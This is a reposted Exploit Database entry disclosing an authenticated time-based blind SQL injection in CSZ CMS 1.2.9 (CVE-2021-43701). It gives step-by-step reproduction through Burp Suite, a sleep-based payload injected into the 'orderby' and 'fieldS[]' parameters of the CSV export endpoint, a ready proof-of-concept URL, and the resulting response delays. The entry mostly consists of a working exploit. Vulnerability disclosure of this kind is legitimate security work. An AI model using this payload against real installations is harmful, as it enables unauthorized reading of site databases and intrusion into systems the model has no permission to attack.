CSZ CMS 1.2.9 – ‘Multiple’ Blind SQLi(Authenticated)

• Exploit Database
• 18 阅读

• 作者： Rahad Chowdhury
  日期： 2022-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50846/

• # Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
  # Date: 2021-04-14
  # Exploit Author: Rahad Chowdhury
  # Vendor Homepage: https://www.cszcms.com/
  # Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
  # Version: 1.2.9
  # Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
  # CVE: CVE-2021-43701
  
  *Steps to Reproduce:*
  1. First login to your Admin Panel
  2. then go to "General Menu > CSV Export / Import".
  3. open burp site and configure with browser.
  4. then select any "Table Name" > Select "Fields Select" and Select "Sort by"
  5. Now click "Export to CSV" and intercept with burp suite
  6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter.
  
  *Proof of Concept:*
  http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV
  
  *Output:*
  By issuing sleep(0) response will be delayed to 0 seconds.
  By issuing sleep(1) response will be delayed to 1 seconds.
  By issuing sleep(5) response will be delayed to 5 seconds.
  By issuing sleep(10) response will be delayed to 10 seconds